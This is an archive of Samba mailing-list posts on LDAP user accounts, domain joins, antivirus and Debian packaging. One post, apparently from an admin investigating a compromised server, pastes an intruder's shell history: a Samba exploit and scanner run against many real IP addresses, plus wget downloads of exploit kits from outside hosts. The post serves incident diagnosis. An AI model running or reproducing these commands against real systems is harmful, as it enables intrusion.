[Samba] maximum username length
Hello! We encountered a problem with our (LDAP) usernames: It seems that windows truncates uids to 20 characters and since our ~4000 users follow the uid-schema givenname.lastname we have some uid's that are (much) longer than 20 characters. Does anybody know if this is a samba or a windows problem and how we can fix it (without changing the actual uid's that work any other service without problems: smtp/pop/imap/ssh/ftp/http/...) best regards Markus -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
[Samba] Faked samba packages / rootkit?
./psybnc 350 vi psybnc.conf 351 ./psybnc 352 cd .. 353 adduser 354 cd /tmo/rk/w00t 355 cd /tmp/rk/w00t 356 ./samba -b 0 -v 193.170.8.129 357 cd /tmp/rk/w00t 358 ./samba -b 0 -v 211.21.64.204 359 ./samba -b 0 -v 211.21.64.204 360 ./samba -b 0 -v 128.210.147.242 361 cd /tmp/rk/w00t 362 ./asmb 128.210 363 ./asmb 128.211 364 ./asmb 128.209 365 ./asmb 128 366 ./asmb 210.86 367 ./asmb 128 368 ./asmb 219 369 ./asmb 219.111 370 ./asmb 219.166 371 cat woot.log 372 ./samba -b 0 -v 219.166.79.186 373 ./samba -b 0 -v 219.166.81.34 374 ./asmb 219.80 375 cat woot.log 376 ./asmb 219.91 377 ./samba -b 0 -v 219.91.104.72 378 ./asmb 211.23 379 ./asmb 212.54 380 ./asmb 212.163 381 ./asmb 212.191 382 cd .. 383 wget xplo.150m.com/allsun.tgz 384 tar zxvf allsun.tgz 385 tar xf allsun.tgz 386 gunzip allsun.tgz 387 cd w00t/ 388 ./asmb 10.12 389 ./asmb 212.37 390 ./asmb 215 391 ./asmb 189 392 ./asmb 140 393 ./asmb 82.129 394 ./asmb 82.39 395 cd /tmp/rk 396 cd w00t/ 397 ./samba -b 0 -v 213.81.174.155 398 cat woot.log 399 cd .. 400 ls 401 cd w00t/ 402 ./asmb 213.81 403 cd /var/tmp/.nlp 404 cd selena/ 405 ls 406 ./ssx 407 cd /tmp 408 cd rk 409 cd w00t/ 410 ./asmb 210 411 ./asmb 210.146 412 ./asmb 210.192 413 ls 414 ./samba -b 0 -v 128.210.147.242 415 ./samba -b 0 -v 128.210.147.241 416 ./samba -b 0 -v 128.210.147.243 417 ./samba -b 0 -v 128.210.147.241 418 ./samba -b 0 -v 128.210.147.242 419 ./samba -b 0 -v 128.210.147.242 420 ./asmb 210.233 421 ./samba -b 0 -v 210.233.23.147 422 ./asmb 210.59 423 ./asmb 211 424 ./asmb 211.130 425 cat woot.lo 426 ./asmb 211.21 427 cat woot.log 428 ./samba -b 0 -v 211.21.64.204 429 ./asmb 211.22 430 ./asmb 212 431 ./asmb 212.37 432 ./asmb 212.101 433 ./asmb 212.185 434 ./asmb 212.36 435 ./asmb 212.80 436 ./asmb 214 437 ./asmb 158 438 ./asmb 02 439 ./asmb 82 440 ./asmb 82.161 441 ./asmb 82.255 442 cd /tmp/rk/w00t 443 ls 444 ./asmb 83 445 ./asmb 193.40 446 ./asmb 212.28 447 ./asmb 172 448 ./asmb 172.163 449 ./asmb 62.218 450 ./asmb 61.189 451 ./asmb 63 452 ./asmb 62.233 453 ./asmb 62.146 454 ./asmb 62.140 455 ./asmb 62 456 ./asmb 62.174 457 ./asmb 62.32 458 ./asmb 62.57 459 ./asmb 62.90 460 ./asmb 207.44 461 ./asmb 213.64 462 ./asmb 213.52 463 ./asmb 213.60 464 cat woot.log 465 ./samba -b 0 -v 213.60.109.1 466 ./samba -b 0 -v 213.60.109.1 467 wget http://members.xoom.it/pippo46/php.tar 468 tar xf php.tar 469 ls 470 cd php.tar 471 cd .. 472 cd php.tar 473 wget http://members.xoom.it/pippo46/php.tar 474 tar xf php.tar 475 ls 476 wget http://62.211.66.12/pippo46/php.tar 477 ./Start 62.162 478 ls 479 tar xf php.tar 480 tar zxvf php.tar 481 5http://www.zorgii.0catch.com/phpxpl.tar.gz 482 wget http://www.zorgii.0catch.com/phpxpl.tar.gz 483 tar zxvf phpxpl.tar.gz 484 5gunzip phpxpl.tar.gz 485 gunzip phpxpl.tar.gz 486 cd w00t/ 487 ./asmb 213.61 488 ./samba -b 0 -v 213.60.109.1 489 ./asmb 213.62 490 ./asmb 213.58 491 ./asmb 213.57 492 ./asmb 213.70 493 ./asmb 213.80 494 ./samba -b 0 -v 81.183.0.29 495 w 496 cd /var/tmp 497 cd /tmp/rk 498 cd w00t/ 499 ./samba -b 0 -v 211.22.94.147 500 ./samba -b 0 -v 194.95.226.21 -- \\\ ||| /// _\=/_ ( @ @ )(o o) +oOOo-(_)-oOOo--oOOo-(_)-oOOo--+ | Markus Schabel TGM - Die Schule der Technik www.tgm.ac.at | | IT-Service A-1200 Wien, Wexstrasse 19-23 net.tgm.ac.at | | [EMAIL PROTECTED] Tel.: +43(1)33126/316 | | [EMAIL PROTECTED] Fax.: +43(1)33126/154 | | FSF Associate Member #597, Linux User #259595 (counter.li.org) | |oOOoYet Another Spam Trap: oOOo | | ()oOOo[EMAIL PROTECTED] ( ) oOOo | +\ (( )--\ ( -( )-+ \_) ) /\_) ) / (_/ (_/ Computers are like airconditioners: They stop working properly if you open windows. -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
[Samba] Samba + LDAP + multiple Domains
Hello! Running the new Samba 3.0 with all users in an LDAP directory with the new objectClass sambaSamAccount there seems to be a problem with multiple domains. I have some users that are in more than one domain. Previously this was no problem, because all domains had access to the same LDAP user account and allowed users are controlled with specific filters. Now the sambaSID contains the domainSID which is different for each domain, so that it is not possible to use the same account for more than one domain. How do you solve this? Are trust relationships that mature that they can solve this? thanks Markus -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] need of a user root in ldap ?
John H Terpstra wrote: On Tue, 16 Sep 2003, Antoine Jacoutot wrote: Hi ! Is there the need for a root account when using samba-3.0+ldap ? I'm asking this because I cannot add XP workstations to the domain (I made the registry changes), I get an access denied. Under NT, there's no problem, it does not even ask for a login/password as long as the workstation account is created in samba. With XP, I use a user account who is also part of the admins group, but as I said, I get an access denied. Any idea ? Yes. The account you use to add machines has to have uid=0. ie: root. Is this *really* needed if the machine accounts are stored in LDAP? For writing /etc/passwd you need to be root, but for writing LDAP you usually don't need to be root... You only need to have execute permissions for the machine-add script... As Andrew said, you have to be domain admin (that means ...-500 as SID), but root?? regards Markus -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] Users only in ldap
Lucas Lain wrote: Hi everybody ... !! i have a few questions... i want to implement samba with ldap(only to share folders) ... and i want to know if i can create virtual users (the users are only in the ldap server, and not in the passwd file) is it posible?? You can have the passwd/shadow also in LDAP (look at libpam-ldap and libnss-ldap). This works without problems. regards -- \\\ ||| /// _\=/_ ( @ @ )(o o) +oOOo-(_)-oOOo--oOOo-(_)-oOOo--+ | Markus Schabel TGM - Die Schule der Technik www.tgm.ac.at | | IT-Service A-1200 Wien, Wexstrasse 19-23 net.tgm.ac.at | | [EMAIL PROTECTED] Tel.: +43(1)33126/316 | | [EMAIL PROTECTED] Fax.: +43(1)33126/154 | | FSF Associate Member #597, Linux User #259595 (counter.li.org) | |oOOoYet Another Spam Trap: oOOo | | ()oOOo[EMAIL PROTECTED] ( ) oOOo | +\ (( )--\ ( -( )-+ \_) ) /\_) ) / (_/ (_/ Computers are like airconditioners: They stop working properly if you open windows. -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] Samba, email, LDAP and password integration andmanagement
Brian Johnson wrote: I set up a test server about a year ago to try this and gave up since it didn't seem that the processes were quite yet in place to do it .. I am evaluating the potential for Samba and Linux accounts (including postfix email accounts) to share the same passwords and have a process in place to encourage users to change their passwords and try to prevent esay to crack passwords Could someone please confirm whether they have such a system working and how difficult it was to set up? When I looked at it before, it seemed that although Samba could use LDAP, it used a different schema from the standard system accounts and therefore there was not really any sharing of password data If it matters, my server I'd like to do this on is a Redhat 7.3 system I'm running the following services/daemons with my LDAP-users: * postfix for address2mailbox-mapping, aliases, forwardings and authenticated SMTP * courier for authenticated access to POP3 and IMAP * apache with LDAP-authenticated .htacces * proftpd with LDAP-users/homedirs * samba as domain-controller and file-servers with LDAP-users * dhcpd loads configuration from LDAP and stores leases in LDAP * php-based addressbook * squirrelmail webmail currently work in progress: * dhcpd logs leases into LDAP so that BIND or tinydns can do DNS with that data I think that's all for the moment. Sure, it is *a lot of* work to get all this running, but it's really nice when it finally works. regards -- \\\ ||| /// _\=/_ ( @ @ )(o o) +oOOo-(_)-oOOo--oOOo-(_)-oOOo--+ | Markus Schabel TGM - Die Schule der Technik www.tgm.ac.at | | IT-Service A-1200 Wien, Wexstrasse 19-23 net.tgm.ac.at | | [EMAIL PROTECTED] Tel.: +43(1)33126/316 | | [EMAIL PROTECTED] Fax.: +43(1)33126/154 | | FSF Associate Member #597, Linux User #259595 (counter.li.org) | |oOOoYet Another Spam Trap: oOOo | | ()oOOo[EMAIL PROTECTED] ( ) oOOo | +\ (( )--\ ( -( )-+ \_) ) /\_) ) / (_/ (_/ Computers are like airconditioners: They stop working properly if you open windows. -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] Re: Need help understanding smbldap-tools and user records
Jim wrote: After investigateing the scripts behaviour a little further I found that the answer is no. The are not the same. The smblda-adduser.pl script creates primaryGroupID as gidNumber + (gidNumber * 2) + 1 such that if you add a user who's gidNumber is 1002 you wind up with a primaryGroupID that is 3005. Sounds fair. That's because samba can't differentiate between a user and a group, so you calculate the rid with uidNumber*2 and the GroupID with gidNumber*2+1, so you can differentiate odd/even and never get equal numbers. At least I think it is so ;) regards -- \\\ ||| /// _\=/_ ( @ @ )(o o) +oOOo-(_)-oOOo--oOOo-(_)-oOOo--+ | Markus Schabel TGM - Die Schule der Technik www.tgm.ac.at | | IT-Service A-1200 Wien, Wexstrasse 19-23 net.tgm.ac.at | | [EMAIL PROTECTED] Tel.: +43(1)33126/316 | | [EMAIL PROTECTED] Fax.: +43(1)33126/154 | | FSF Associate Member #597, Linux User #259595 (counter.li.org) | |oOOoYet Another Spam Trap: oOOo | | ()oOOo[EMAIL PROTECTED] ( ) oOOo | +\ (( )--\ ( -( )-+ \_) ) /\_) ) / (_/ (_/ Computers are like airconditioners: They stop working properly if you open windows. -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] Need help understanding smbldap-tools and user records
Jim wrote: Why is it that when I use /usr/share/samba/scripts/smbldap-userad.pl -a Administrator -g dadm that the group doesn't get changed to dadm? Instead it stays set to the value specified in $_defaultUserGid. Also, I must say that I find the default of *not* adding a group for the user very counter-intuitive. Not sure, maybe they add the user Administrator as memberUid to the group dadm? What exactly is the difference between gidNumber and primaryGroupID in a users record? The gidNumber is the unix/linux-groupID, the primaryGroupID is the ID used by windows in a domain. regards -- \\\ ||| /// _\=/_ ( @ @ )(o o) +oOOo-(_)-oOOo--oOOo-(_)-oOOo--+ | Markus Schabel TGM - Die Schule der Technik www.tgm.ac.at | | IT-Service A-1200 Wien, Wexstrasse 19-23 net.tgm.ac.at | | [EMAIL PROTECTED] Tel.: +43(1)33126/316 | | [EMAIL PROTECTED] Fax.: +43(1)33126/154 | | FSF Associate Member #597, Linux User #259595 (counter.li.org) | |oOOoYet Another Spam Trap: oOOo | | ()oOOo[EMAIL PROTECTED] ( ) oOOo | +\ (( )--\ ( -( )-+ \_) ) /\_) ) / (_/ (_/ Computers are like airconditioners: They stop working properly if you open windows. -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] Re: Need help understanding smbldap-tools and userrecords
Jim wrote: Are they the same then or are there SID issues? I don't know. It works fine without the primaryGroupID at all... - at least I haven't found any problems The gidNumber is the unix/linux-groupID, the primaryGroupID is the ID used by windows in a domain. -- \\\ ||| /// _\=/_ ( @ @ )(o o) +oOOo-(_)-oOOo--oOOo-(_)-oOOo--+ | Markus Schabel TGM - Die Schule der Technik www.tgm.ac.at | | IT-Service A-1200 Wien, Wexstrasse 19-23 net.tgm.ac.at | | [EMAIL PROTECTED] Tel.: +43(1)33126/316 | | [EMAIL PROTECTED] Fax.: +43(1)33126/154 | | FSF Associate Member #597, Linux User #259595 (counter.li.org) | |oOOoYet Another Spam Trap: oOOo | | ()oOOo[EMAIL PROTECTED] ( ) oOOo | +\ (( )--\ ( -( )-+ \_) ) /\_) ) / (_/ (_/ Computers are like airconditioners: They stop working properly if you open windows. -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] Virus Protection ... Which one...?
Stephen Kuhn wrote: On Tue, 2003-01-28 at 00:36, Ryan Beisner wrote: Hi all I've found a few different packages (RAV, Kaspersky,Vexira, Clam ...) which offer Anti-Virus features for Linux servers. It looks like RAV specifically supports Samba servers. My question is: Can anyone relay their experiences / opinions / thoughts about which one would work best in a multiple-server environment (~100 Windows Clients)? Thanks in advance -- all comments are welcome. -Ryan Beisner In the sense of keeping it simple - I got the free version of f-prot and use it in a script called out every hour to scan my Samba shares (even works on mounted shares to Windows machines) - once I got it setup, it was great - fast and easy and helps to keep everything clean here...I went for free because of budgeting...and well, can't complain - especially after this past weekend! We're up and running! You can run Antivir (www.hbedv.de) without problems on your linux-box, there's a public noncommercial licence available, and for commercial usage the prices are ok. running also as mailgate on our mailserver ;) regards Markus Schabel ++ | TGM - Die Schule der Technik, IT-Service | |A-1200 Wien, Wexstrasse 19-23 | | Tel.: +43(1)33126/316 Fax: +43(1)33126/154 | | eMail: [EMAIL PROTECTED]| |[EMAIL PROTECTED] | | FSF Associate Member #597 | | Linux User #259595 (http://counter.li.org) | ++ Computers are like airconditioners: They stop working properly if you open windows. -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Virus Alterts - Was: Re: [Samba] Fw: Neu Textdokument (2)
Ken Schneider wrote: I guess it's time to unsubscribe from this list since they don't know how to setup and use anti-virus software on the list server. At least today some antivir software would be really great, or at least some mechanism to block all the antivir-software-answers to the list... should be no problem to set up a free antivirus-mail-filtering software (e.g. clamav with AMaViS)... -- mfg Markus Schabel ++ | TGM - Die Schule der Technik, IT-Service | |A-1200 Wien, Wexstrasse 19-23 | | Tel.: +43(1)33126/316 Fax: +43(1)33126/154 | | eMail: [EMAIL PROTECTED]| |[EMAIL PROTECTED] | | FSF Associate Member #597 | | Linux User #259595 (http://counter.li.org) | ++ Computers are like airconditioners: They stop working properly if you open windows. -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] OT: Virus Traffic jams
Rashkae wrote: I have to wonder which, at this point causes more congestion and stress to e-mail systems. E-mail viruses, or aggresive Anti-Virus programs that are configured to allert everyone. Is this a configurable option in AV software... Should people start pressuring AV companies to change this behaviour? AV-response-mails usually go to the sender (from:), not to the recipients (to:). I think nobody is interested in getting you would have received a virus without antivir protection except AV-vendor-PR-departments. regards Markus Schabel ++ | TGM - Die Schule der Technik, IT-Service | |A-1200 Wien, Wexstrasse 19-23 | | Tel.: +43(1)33126/316 Fax: +43(1)33126/154 | | eMail: [EMAIL PROTECTED]| |[EMAIL PROTECTED] | | FSF Associate Member #597 | | Linux User #259595 (http://counter.li.org) | ++ Computers are like airconditioners: They stop working properly if you open windows. -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] linux ldap samba-PDC windows
azzouz wrote: hi all, i have linux and windows machines. ldap as server account and samba server as PDC. When an user changed his password from a windows machine he must also change the password in a linux machine. How could a user change his password once only. With unix passwd sync (AFAIK theres something else for ldap in samba 3.0), or with a webinterface. Or just change them on the linux machine via script so that the samba-passwd gets updated automatically. take a look at the scripts at samba.idealx.org regards Markus Schabel ++ | TGM - Die Schule der Technik, IT-Service | |A-1200 Wien, Wexstrasse 19-23 | | Tel.: +43(1)33126/316 Fax: +43(1)33126/154 | | eMail: [EMAIL PROTECTED]| |[EMAIL PROTECTED] | | FSF Associate Member #597 | | Linux User #259595 (http://counter.li.org) | ++ Computers are like airconditioners: They stop working properly if you open windows. -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] New Debian Packages?
Nicki Messerschmidt, Linksystem Muenchen GmbH wrote: Hi there, does anyone know where I can get new samba packages for debian, because woody is at 2.2.3a-12 and this version has definitev a problem with Access 97 databases... *arg* And I'm not able to produce new debian packages myself. Any help is appreciated... Just grep the CVS, copy packaging/debian/* to debian/* and start dpkg-buildpackage. Probably you have to set the correct version with dch -i before invoking dpkg-buildpackage. regards Markus Schabel ++ | TGM - Die Schule der Technik, IT-Service | | A-1200 Wien, Wexstrasse 19-23 | | Tel.: +43(1)33126/316 Fax: +43(1)33126/154 | | eMail: [EMAIL PROTECTED]| |[EMAIL PROTECTED] | | FSF Associate Member #597 | | Linux User #259595 (http://counter.li.org) | ++ What goes up, must come down. Ask any SysAdmin. -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] Method for joining machines to PDC without using root
___cliff rayman___ wrote: currently, in order to join a win XP machine to a samba PDC, you have to use the root account (although you can use an smbpasswd and not the linux password). is there any way to set up another account to do this one particular task (one without uid=0)?. if we have users in remote places, i do not want to have to go over to their work station just to log them on the the domain. alsoi don't want to give them a login and password that could compromise the system the samba is running on (linux). AFAICT it works with a non-root user if you use LDAP instead of smbpasswd. snip/ -- Markus Schabel ++ | TGM - Die Schule der Technik | | IT-Service | | A-1200 Wien, Wexstrasse 19-23 | | Tel.: +43(1)33126/316 Fax: +43(1)33126/154 | | eMail: [EMAIL PROTECTED]| ++ -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] LDAP - adding info to database
Chris Mason wrote: I have installed openldap and the samba.idealx.org ldap configuration and scripts, and now I have ldap authentication working wonderfully well. I'd like to be able to use the same ldap user database for other info such as phone numbers, email, etc, but I don't know how to add it or whether it is a good idea. Anyone done this? Work's fine here. Just use the inetOrgPerson-Attributes. On the OpenLDAP-FAQ-Site you can find some informations about this. We use LDAP as source for Samba-Accounts, Posix-Accounts, addressbook and for IMAP/POP-Accounts, mailquotas and mail- forwarding-addresses -- Markus Schabel ++ | TGM - Die Schule der Technik | | IT-Service | | A-1200 Wien, Wexstrasse 19-23 | | Tel.: +43(1)33126/316 Fax: +43(1)33126/154 | | eMail: [EMAIL PROTECTED]| ++ -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] Method for joining machines to PDC without using root
Alan Woodland wrote: Markus Schabel wrote: ___cliff rayman___ wrote: currently, in order to join a win XP machine to a samba PDC, you have to use the root account (although you can use an smbpasswd and not the linux password). is there any way to set up another account to do this one particular task (one without uid=0)?. if we have users in remote places, i do not want to have to go over to their work station just to log them on the the domain. alsoi don't want to give them a login and password that could compromise the system the samba is running on (linux). AFAICT it works with a non-root user if you use LDAP instead of smbpasswd. snip/ Im currently doing that with the new samba from cvs using smbgroupedit, but it is possible with older sambas using (IIRC) domain admin group = @groupname and having the users you want to be able to add machines to the domain in that group. It does however make the user super user equivilent when logged in through samba that way, but not super user on the actual unix boxes. Alan I'm doing it with samba 2.2.7a. But I'd like something like add computer group = valid-user, so that everybody with a user-account can add his workstation to the domain (if the workstation's ip is logged as active by the dhcp). Probably it's possible to add computer-accounts via dhcp-log's (but I think the problem here is that the DHCP-hostname could be different from the NetBIOS-name. -- Markus Schabel ++ | TGM - Die Schule der Technik | | IT-Service | | A-1200 Wien, Wexstrasse 19-23 | | Tel.: +43(1)33126/316 Fax: +43(1)33126/154 | | eMail: [EMAIL PROTECTED]| ++ -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
[Samba] Add Workstation to Domain - valid local system user?
Hi! I'm running Samba 2.2.7a as Domain Controller, and when I try to add a workstation to the domain, I get always the following logentry (and the operation fails): [2002/12/20 14:30:21, 0] passdb/pdb_ldap.c:pdb_getsampwnam(859) LDAP search ((uid=vmware-w2ks_)(objectclass=sambaAccount)) returned 0 entries. [2002/12/20 14:30:22, 0] rpc_server/srv_samr_nt.c:_api_samr_create_user(1929) User vmware-w2ks$ does not exist in system password file (usually /etc/passwd). Cannot add account without a valid local system user. [2002/12/20 14:30:23, 0] passdb/pdb_ldap.c:pdb_getsampwnam(859) LDAP search ((uid=vmware-w2ks_)(objectclass=sambaAccount)) returned 0 entries. [2002/12/20 14:30:23, 0] rpc_server/srv_netlog_nt.c:get_md4pw(176) get_md4pw: Workstation vmware-w2ks$: no account in domain When trying to join the Domain I use the Administrator-Account (in LDAP). Running the add-user-script as Administrator from the shell works fine, but it doesn't work from via samba. In my smb.conf I've tried some settings for domain admin group. I've tried: domain admin group = Administrator domain admin group = Administrator @Domain Admins (Administrator is member of the Group Domain Admins). When changing ownership of a file to Administraot:Domain Admins, it works fine - I can see the names of the user/group, so NSS-LDAP-Lookups work fine. I've also tried to change uidNumber and gidNumber of Administrator to 0, the same problem. Any ideas what's wrong? regards Markus Schabel ++ | TGM - Die Schule der Technik | | IT-Service | | A-1200 Wien, Wexstrasse 19-23 | | Tel.: +43(1)33126/316 Fax: +43(1)33126/154 | | eMail: [EMAIL PROTECTED]| ++ -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] Add Workstation to Domain - valid local system user?
Markus Schabel wrote: Hi! I'm running Samba 2.2.7a as Domain Controller, and when I try to add a workstation to the domain, I get always the following logentry (and the operation fails): [2002/12/20 14:30:21, 0] passdb/pdb_ldap.c:pdb_getsampwnam(859) LDAP search ((uid=vmware-w2ks_)(objectclass=sambaAccount)) returned 0 entries. [2002/12/20 14:30:22, 0] rpc_server/srv_samr_nt.c:_api_samr_create_user(1929) User vmware-w2ks$ does not exist in system password file (usually /etc/passwd). Cannot add account without a valid local system user. [2002/12/20 14:30:23, 0] passdb/pdb_ldap.c:pdb_getsampwnam(859) LDAP search ((uid=vmware-w2ks_)(objectclass=sambaAccount)) returned 0 entries. [2002/12/20 14:30:23, 0] rpc_server/srv_netlog_nt.c:get_md4pw(176) get_md4pw: Workstation vmware-w2ks$: no account in domain When trying to join the Domain I use the Administrator-Account (in LDAP). Running the add-user-script as Administrator from the shell works fine, but it doesn't work from via samba. In my smb.conf I've tried some settings for domain admin group. I've tried: domain admin group = Administrator domain admin group = Administrator @Domain Admins (Administrator is member of the Group Domain Admins). When changing ownership of a file to Administraot:Domain Admins, it works fine - I can see the names of the user/group, so NSS-LDAP-Lookups work fine. I've also tried to change uidNumber and gidNumber of Administrator to 0, the same problem. Any ideas what's wrong? Found the problem: In my add-user-script there were some relative paths, after changing them to be absolute it works. -- Markus Schabel ++ | TGM - Die Schule der Technik | | IT-Service | | A-1200 Wien, Wexstrasse 19-23 | | Tel.: +43(1)33126/316 Fax: +43(1)33126/154 | | eMail: [EMAIL PROTECTED]| ++ -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] SMB LDAP tools
Gregory Chagnon wrote: Hi- I'm using the SMB ldap tools to add entries to my ldap database for use with Samba. Does anyone know how I can create the userPassword field with PHP? I've tried a few things, but none of them worked. Thanks!! -Greg Depends on what you want to use as algorithm. But it works simply: just do $userPassword = {crypt}.crypt( $clearPassword ); Markus Schabel ++ | TGM - Die Schule der Technik | | IT-Service | | A-1200 Wien, Wexstrasse 19-23 | | Tel.: +43(1)33126/316 Fax: +43(1)33126/154 | | eMail: [EMAIL PROTECTED]| ++ -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
[Samba] do not show printers?
Hello! What can I do to tell samba to do not show the printers. I've configured printing = no and removed the [printers]-Section, but I still see the printers section when browsing the server. Any hints? regards Markus Schabel ++ | TGM - Die Schule der Technik | | IT-Service | | A-1200 Wien, Wexstrasse 19-23 | | Tel.: +43(1)33126/316 Fax: +43(1)33126/154 | | eMail: [EMAIL PROTECTED]| ++ -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: [Samba] do not show printers?
Joel Hammer wrote: Have you restarted smbd? sure. I've attached the output of testparm Joel On Fri, Dec 06, 2002 at 04:49:09PM +0100, Markus Schabel wrote: Hello! What can I do to tell samba to do not show the printers. I've configured printing = no and removed the [printers]-Section, but I still see the printers section when browsing the server. Any hints? -- Markus Schabel ++ | TGM - Die Schule der Technik | | IT-Service | | A-1200 Wien, Wexstrasse 19-23 | | Tel.: +43(1)33126/316 Fax: +43(1)33126/154 | | eMail: [EMAIL PROTECTED]| ++ Load smb config files from /etc/samba/smb.conf Processing section [swd] Loaded services file OK. Press enter to see a dump of your service definitions # Global parameters [global] coding system = client code page = 850 code page directory = /usr/share/samba/codepages workgroup = ITS netbios name = SWD netbios aliases = netbios scope = server string = %h server (Samba %v) interfaces = bind interfaces only = No security = USER encrypt passwords = Yes update encrypted = No allow trusted domains = Yes hosts equiv = min passwd length = 5 map to guest = Never null passwords = No obey pam restrictions = Yes password server = smb passwd file = /etc/samba/smbpasswd root directory = pam password change = No passwd program = /usr/bin/passwd passwd chat = *new*password* %n\n *new*password* %n\n *changed* passwd chat debug = No username map = password level = 0 username level = 0 unix password sync = No restrict anonymous = No lanman auth = Yes use rhosts = No admin log = No log level = 0 syslog = 0 syslog only = No log file = /var/log/samba/log.%m max log size = 1000 timestamp logs = Yes debug hires timestamp = No debug pid = No debug uid = No protocol = NT1 large readwrite = Yes max protocol = NT1 min protocol = CORE read bmpx = No read raw = Yes write raw = Yes nt smb support = Yes nt pipe support = Yes nt status support = Yes announce version = 4.9 announce as = NT max mux = 50 max xmit = 16644 name resolve order = lmhosts host wins bcast max ttl = 259200 max wins ttl = 518400 min wins ttl = 21600 time server = No unix extensions = No change notify timeout = 60 deadtime = 0 getwd cache = Yes keepalive = 300 lpq cache time = 10 max smbd processes = 0 max disk size = 0 max open files = 1 name cache timeout = 660 read size = 16384 socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192 stat cache size = 50 use mmap = Yes total print jobs = 0 load printers = No printcap name = /etc/printcap disable spoolss = No enumports command = addprinter command = deleteprinter command = show add printer wizard = Yes os2 driver map = strip dot = No mangling method = hash character set = mangled stack = 50 stat cache = Yes domain admin group = domain guest group = machine password timeout = 604800 add user script = delete user script = logon script = logon path = \\%N\%U\profile logon drive = logon home = \\%N\%U domain logons = No os level = 20 lm announce = Auto lm interval = 60 preferred master = No local master = No domain master = No browse list = Yes enhanced browsing = Yes dns proxy = No wins proxy = No wins server = wins support = No wins hook = kernel oplocks = Yes lock spin count = 3 lock spin time = 10 oplock break wait time = 0 ldap server = mail.tgm.ac.at ldap port = 389 ldap suffix = dc=tgm,dc=ac,dc=at ldap filter = ((uid=%u)(objectclass=sambaAccount)) ldap admin dn = cn=admin,dc=tgm,dc=ac,dc=at ldap ssl = no add share command = change share command = delete share command = config file = preload = lock dir = pid directory = /var/run/samba utmp directory = wtmp directory = utmp = No default service = message command = dfree command = valid chars = remote announce = remote browse sync
Re: [Samba] do not show printers?
Gerald (Jerry) Carter wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Fri, 6 Dec 2002, Markus Schabel wrote: What can I do to tell samba to do not show the printers. I've configured printing = no and removed the [printers]-Section, but I still see the printers section when browsing the server. Any hints? Do you mean the Printers folder? (add disable spoolss = yes). thanks, that helped Markus -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
[Samba] CVS release-2.2.7 and debian
I've just downloaded 2.2.7 from CVS and started dpkg-buildpackage: dpkg-buildpackage: source version is 2.2.6-0.1 Eventually somebody should change the file packaging/Debian/debian/changelog regards Markus Schabel ++ | TGM - Die Schule der Technik | | IT-Service | | A-1200 Wien, Wexstrasse 19-23 | | Tel.: +43(1)33126/316 Fax: +43(1)33126/154 | | eMail: [EMAIL PROTECTED]| ++ -- To unsubscribe from this list go to the following URL and read the instructions: http://lists.samba.org/mailman/listinfo/samba
Re: make 'ldap trust ids' the default?
Andrew Bartlett wrote: I've just committed a patch that adds a new 'ldap trust ids' smb.conf option. Currently defaulting to off, this option allows pdb_ldap to use the ldap server directly to determine if a user 'exists' in unix. This gives us a performance boost, particularly on enumerations: (Removes the extra lookup per record). The logic is such that if there are no posixAccount attributes for a user, we try getpwnam(), it's just that we look in LDAP first. As such, do people think we should have this by default? This was a fix to solve some particular problems that metze had, and I'll see if I can get some feedback on exactly how much this helps. Andrew Bartlett That sounds like a good idea, to do it as default or not is a good question, when you have a little user database it isn't really helpfull, but I think it should be on by default. If I could only find some time somewhere, I'll take a look at this. regards -- Markus Schabel |- | TGM - Die Schule der Technik | | IT-Service | | A-1200 Wien, Wexstrasse 19-23 | | Tel.: +43(1)33126/316 Fax: +43(1)33126/154 | | eMail: [EMAIL PROTECTED]| -|
Re: [Samba] Is 2.2.6 Final?
